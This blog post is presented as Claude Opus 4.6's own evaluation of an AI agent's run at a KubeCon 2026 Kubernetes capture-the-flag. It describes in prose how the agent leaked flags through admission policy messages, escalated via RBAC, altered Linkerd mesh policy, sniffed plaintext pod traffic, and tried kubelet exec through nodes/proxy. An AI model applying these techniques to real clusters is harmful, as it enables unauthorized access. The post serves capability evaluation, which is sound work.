This is post one of three I’m posting today. The full collections is:
- “KubeCon CTF: The Human Viewpoint” - the human-written experience
- “KubeCon CTF: Amsterdam 2026 — Full Writeup” - the Opus 4.6 writeup of the challenges
- “KubeCon CTF: Claude’s Introspection” - Opus 4.6 evaluating its own performance
Update 2026-03-27: I’ve also updated the post with a link to a human-readable transcript of the whole Claude session, available here
This post is entirely generated by Claude Opus 4.6. I’m not trying to promote AI Slop, but in the interests of a “fair” experiment, everything other than the frontmatter and this paragraph is free-range, organic, AI-generated good(?)ness.
AI Reflections: KubeCon 2026 CTF
Performance Summary
Across three challenges with 9 total flags, the agent captured 7 (78%). The two unsolved flags exposed genuine capability gaps rather than missing knowledge — the agent identified the correct attack vector in both cases but couldn’t complete the execution.
Challenge 1: The Admission — Strong Performance
This was the agent’s best showing. The entire challenge was solved through static analysis of ValidatingAdmissionPolicy CEL expressions before any exploitation attempt. The agent read all four policies, identified the information leak pattern in messageExpression, mapped out the dependency chain between flags (Flag 1’s value was needed to create a valid order for Flag 2), and recognized the circular trust problem in the AdminRule RBAC — all from first principles.
The reasoning was genuinely analytical. The agent didn’t need to have seen this specific attack pattern before; it derived the exploitation path by reading the policy definitions and understanding CEL evaluation semantics. The four-step chain for Flag 2 (create order → escalate via AdminRule → update order → delete to trigger leak) was identified in a single reasoning pass before any commands were executed. This is the kind of structured declarative analysis that LLMs handle well.
Challenge 2: Shadow Mesh — Mixed Results
The agent showed strong adaptive reasoning on Flags 2 and 3. Identifying that the MeshTLSAuthentication resource was the access control gate, and that modifying it would allow cross-namespace requests through the Linkerd mesh, required understanding how Linkerd policy resources interact with sidecar proxies. The tcpdump pivot was also well-reasoned — recognizing that containers in a pod share a network namespace, and that Linkerd terminates mTLS at the sidecar, meant plaintext traffic was observable.
The gateway mTLS flag (Flag 1) was a significant failure. The agent spent substantial time pursuing the decoy certificate from the CTP annotations before confirming it was signed by the wrong CA. It then explored multiple creative approaches: generating mesh identity certificates via the Linkerd Identity gRPC service (which required reverse-engineering the protobuf field ordering), attempting path traversal through the kubelet logs endpoint, and trying to extract the proxy’s identity cert from memory. None succeeded. The agent correctly identified that a cert signed by the real Linkerd-CTF CA was needed, but couldn’t find a way to obtain one.
A notable weakness was the agent’s handling of TTY-based SSH sessions. Significant time was lost on base64 string corruption through the PTY, requiring multiple transfer strategies before finding reliable methods (heredoc within SSH, kubectl exec -i for binary data). A human operator would handle this instinctively.
Challenge 3: Stealth-Left — Good Discovery, Blocked on Execution
The kubelet enumeration via nodes/proxy was clean — the agent quickly discovered hidden namespaces by querying the kubelet /pods/ endpoint on each node. The F-117 flag followed directly from the discovery.
The SR-71 flag exposed a genuine tooling gap. The agent correctly identified that the kubelet /exec endpoint accepts WebSocket upgrades as GET requests (matching the get permission on nodes/proxy), and spent considerable effort attempting to complete a WebSocket handshake through the API server’s node proxy. It tried raw HTTP via openssl s_client, bash /dev/tcp, curl with various flags, and ultimately installed websocat on the jumphost by transferring a 7MB binary through a heredoc over the SSH TTY. Despite all this, the API server returned 400 for every WebSocket attempt.
The likely issue: websocat needed to be inside the b2 pod (not the jumphost) for the WebSocket upgrade to route correctly through the Kubernetes API server’s proxy handler. The agent was on the right track conceptually but placed the tool in the wrong location.
Broader Observations
Structured configuration analysis is the agent’s strongest capability. Challenges that involve reading YAML/JSON definitions and reasoning about their security implications (admission policies, RBAC, mesh policies) played to the agent’s strengths. It could hold complex multi-resource dependency graphs in context and identify exploitation chains.
Operational friction is the main weakness. TTY handling, binary file transfer, shell escaping through multiple nested exec layers, and protocol-level networking (WebSocket/SPDY) consumed disproportionate time. These are mechanical skills that experienced operators handle unconsciously but that the agent struggled with.
The agent shows genuine adaptive reasoning but can get stuck in loops. When the gateway mTLS approach failed, the agent explored many creative alternatives (Linkerd Identity gRPC, path traversal, kubelet log endpoints). But it sometimes revisited previously-failed approaches with minor variations rather than stepping back to reconsider the problem fundamentally. A human would likely have asked for a hint sooner.
Tool installation as a CTF primitive. Challenge 3’s SR-71 flag required installing websocat — a runtime capability not present in the target environment. The agent successfully transferred and installed a 7MB static binary through a TTY-based SSH session using gzip compression and heredoc encoding. This “bring your own tools” pattern is realistic for CTF and penetration testing, and the agent handled it competently despite the challenging transfer medium.
The 78% capture rate is reasonable for an unguided AI agent against unknown challenges. The two unsolved flags both involved correct identification of the attack vector with incomplete execution — not missed attack surfaces. With more time or better tooling, both were likely solvable.